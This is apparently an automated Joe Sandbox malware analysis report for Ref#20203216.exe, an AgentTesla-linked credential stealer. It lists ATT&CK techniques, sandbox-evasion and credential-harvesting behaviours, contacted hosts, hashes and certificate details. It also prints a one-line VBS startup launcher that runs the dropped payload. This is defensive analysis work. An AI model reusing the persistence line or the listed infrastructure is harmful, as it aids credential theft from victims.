                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579787 Sample: Ref#20203216.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 30 oshi.at 2->30 32 api.ipify.org 2->32 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 10 other signatures 2->56 8 Ref#20203216.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 process4 dnsIp5 34 oshi.at 5.253.86.15, 443, 49733, 49738 HOSTSLICK-GERMANYNL Cyprus 8->34 24 C:\Users\user\AppData\Roaming\iulue.exe, PE32 8->24 dropped 26 C:\Users\user\...\iulue.exe:Zone.Identifier, ASCII 8->26 dropped 28 C:\Users\user\AppData\Roaming\...\iulue.vbs, ASCII 8->28 dropped 66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->66 68 Drops VBS files to the startup folder 8->68 70 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->70 15 Ref#20203216.exe 2 8->15         started        72 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->72 19 iulue.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 36 162.254.34.31, 49735, 49744, 587 VIVIDHOSTINGUS United States 15->36 38 api.ipify.org 104.26.13.205, 443, 49734, 49742 CLOUDFLARENETUS United States 15->38 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Multi AV Scanner detection for dropped file 19->44 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->46 48 Machine Learning detection for dropped file 19->48 21 iulue.exe 2 19->21         started        signatures10 process11 signatures12 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->58 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal ftp login credentials 21->62 64 Tries to harvest and steal browser information (history, passwords, etc) 21->64

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ref#20203216.exe47%VirustotalBrowse
                      Ref#20203216.exe37%ReversingLabsByteCode-MSIL.Trojan.Generic
                      Ref#20203216.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\iulue.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\iulue.exe37%ReversingLabsByteCode-MSIL.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      oshi.at
                      5.253.86.15
                      truefalse
                        high
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            https://oshi.at/nvgUfalse
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://stackoverflow.com/q/14436606/23354Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.0000000002AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://account.dyn.com/Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/mgravell/protobuf-netJRef#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsps.ssl.com0?Ref#20203216.exe, iulue.exe.0.drfalse
                                      high
                                      http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Ref#20203216.exe, iulue.exe.0.drfalse
                                        high
                                        https://github.com/mgravell/protobuf-netRef#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://oshi.atRef#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QRef#20203216.exe, iulue.exe.0.drfalse
                                              high
                                              http://ocsps.ssl.com0Ref#20203216.exe, iulue.exe.0.drfalse
                                                high
                                                http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0Ref#20203216.exe, iulue.exe.0.drfalse
                                                  high
                                                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Ref#20203216.exe, iulue.exe.0.drfalse
                                                    high
                                                    https://api.ipify.org/tRef#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Ref#20203216.exe, iulue.exe.0.drfalse
                                                        high
                                                        https://api.ipify.orgRef#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crls.ssl.com/ssl.com-rsa-RootCA.crl0Ref#20203216.exe, iulue.exe.0.drfalse
                                                            high
                                                            https://github.com/mgravell/protobuf-netiRef#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0Ref#20203216.exe, iulue.exe.0.drfalse
                                                                high
                                                                https://stackoverflow.com/q/11564914/23354;Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://stackoverflow.com/q/2152978/23354Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ssl.com/repository0Ref#20203216.exe, iulue.exe.0.drfalse
                                                                      high
                                                                      http://ocsps.ssl.com0_Ref#20203216.exe, iulue.exe.0.drfalse
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref#20203216.exe, iulue.exe.0.drfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            104.26.13.205
                                                                            api.ipify.orgUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            162.254.34.31
                                                                            unknownUnited States
                                                                            64200VIVIDHOSTINGUStrue
                                                                            5.253.86.15
                                                                            oshi.atCyprus
                                                                            208046HOSTSLICK-GERMANYNLfalse
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1579787
                                                                            Start date and time:2024-12-23 09:07:52 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 6s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:9
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Ref#20203216.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:
                                                                            • Successful, ratio: 94%
                                                                            • Number of executed functions: 205
                                                                            • Number of non-executed functions: 23
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 4.245.163.56
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target Ref#20203216.exe, PID 6776 because it is empty
                                                                            • Execution Graph export aborted for target iulue.exe, PID 3264 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            TimeTypeDescription
                                                                            03:08:45API Interceptor62x Sleep call for process: Ref#20203216.exe modified
                                                                            03:09:02API Interceptor63x Sleep call for process: iulue.exe modified
                                                                            08:08:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            104.26.13.205BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                            • api.ipify.org/
                                                                            lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                            • api.ipify.org/
                                                                            Simple1.exeGet hashmaliciousUnknownBrowse
                                                                            • api.ipify.org/
                                                                            2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                            • api.ipify.org/
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • api.ipify.org/
                                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                            • api.ipify.org/
                                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                            • api.ipify.org/
                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                            • api.ipify.org/
                                                                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                            • api.ipify.org/
                                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                            • api.ipify.org/
                                                                            162.254.34.31Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                  Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                    Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                      Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                        BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                          Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                            SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                              D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                oshi.atRef_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                Swift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 188.241.120.6
                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                • 188.241.120.6
                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                • 188.241.120.6
                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                • 194.15.112.248
                                                                                                api.ipify.orgtg.exeGet hashmaliciousBabadedaBrowse
                                                                                                • 172.67.74.152
                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                • 104.26.12.205
                                                                                                setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                • 104.26.13.205
                                                                                                QUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.13.205
                                                                                                c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.67.74.152
                                                                                                billys.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                • 172.67.74.152
                                                                                                ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                • 104.26.13.205
                                                                                                DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.13.205
                                                                                                4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 172.67.74.152
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSLNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                • 104.21.66.86
                                                                                                FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                • 104.21.32.96
                                                                                                mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                • 172.67.157.254
                                                                                                nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.41.3
                                                                                                jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.32.96
                                                                                                FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.150.173
                                                                                                VIVIDHOSTINGUSarm4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 192.154.238.20
                                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                • 162.254.34.31
                                                                                                Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                • 162.254.34.31
                                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 192.26.155.193
                                                                                                Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 162.254.34.31
                                                                                                Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 162.254.34.31
                                                                                                BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.254.34.31
                                                                                                HOSTSLICK-GERMANYNLRef_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                • 193.142.146.64
                                                                                                an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                build.exeGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                ub16vsLP6y.zipGet hashmaliciousRemcosBrowse
                                                                                                • 193.142.146.203
                                                                                                ISehgzqm2V.zipGet hashmaliciousRemcosBrowse
                                                                                                • 193.142.146.203
                                                                                                Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                                                                • 193.142.146.64
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.26.13.205
                                                                                                • 5.253.86.15
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):80
                                                                                                Entropy (8bit):4.694702276078294
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:FER/n0eFHHot+kiEaKC5THn:FER/lFHIwknaZ5L
                                                                                                MD5:CE80F653F6D49CE4B39F540447D8AD8D
                                                                                                SHA1:928B13E9FD16BAE3C5B201AF876E61DEC0C6CCF7
                                                                                                SHA-256:848144E4A7F7E983071CAA524758B7F66E923CC32FFC98F67FFEFCF3D6BD00DC
                                                                                                SHA-512:F58A6E04E8FC2D82FA94AA7391E5FD0146E627A1F1843C1FC67CA4E7AF77C90129512CBC0DF7E50BD1A4874990ABA4DBD7097EED9B72099579416832F6993CB2
                                                                                                Malicious:true
                                                                                                Reputation:low
                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\iulue.exe"""
                                                                                                Process:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):154592
                                                                                                Entropy (8bit):6.07753472477252
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:aj9JxITkjSu9L8xIWCPAHWoTwuckbZrSV6ICB3pQpYvNX81zJfqK6XiFZKj:aj+TTup8omWiwLcCxSZQpe5WzJfV62M
                                                                                                MD5:9F9DF5620E05DA5BBF797B8531DA35AB
                                                                                                SHA1:22BE3755C61F577FB39E4D71DF0F8D9BFB90AA87
                                                                                                SHA-256:E97247599A336032A86EA5CB42B3B9C971567977E245B689D87C3F2EF3D200E4
                                                                                                SHA-512:365554A00606263906AF881542FF87999C32D30389798219DEB9CB384874A9700EBA56EE883B1DC5238890A6A5EA15F8C3861182B267FB0A6B196BCBDF39E480
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 37%
                                                                                                Reputation:low
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hg.....................J........... ........@.. ....................................`.....................................W.... ...H...........>............................................................... ............... ..H............text........ ...................... ..`.rsrc....H... ...H..................@..@.reloc...............<..............@..B........................H........+..................h............................................0..........(P...*.*.(....*......(..... .N..(D...(....(...+o....&*.(....(....o....~....%:....&~..........s....%.....(...+(....*.s.........*..(....*Z.o.... hO..(D...(....*..(....*...0............+Z.s.....s...... HO..(D...o....o.......o.....o........,..o........,..o........,..o.......&...,.s........ @K..(D...(....o...... .J..(D...(....o......o........io.........,...o......*...@....'..7..........2C..........
                                                                                                Process:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):6.07753472477252
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Ref#20203216.exe
                                                                                                File size:154'592 bytes
                                                                                                MD5:9f9df5620e05da5bbf797b8531da35ab
                                                                                                SHA1:22be3755c61f577fb39e4d71df0f8d9bfb90aa87
                                                                                                SHA256:e97247599a336032a86ea5cb42b3b9c971567977e245b689d87c3f2ef3d200e4
                                                                                                SHA512:365554a00606263906af881542ff87999c32d30389798219deb9cb384874a9700eba56ee883b1dc5238890a6a5ea15f8c3861182b267fb0a6b196bcbdf39e480
                                                                                                SSDEEP:1536:aj9JxITkjSu9L8xIWCPAHWoTwuckbZrSV6ICB3pQpYvNX81zJfqK6XiFZKj:aj+TTup8omWiwLcCxSZQpe5WzJfV62M
                                                                                                TLSH:30E339106BBCCF13C79C95BEE4E001348774CDA26226E7576B807CF969727819BCA297
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....hg.....................J........... ........@.. ....................................`................................
                                                                                                Icon Hash:27d8dcd6d4d85007
                                                                                                Entrypoint:0x4211de
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6768ACE9 [Mon Dec 23 00:20:57 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                                Subject Chain
                                                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                                Version:3
                                                                                                Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                                Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                                Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                                Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
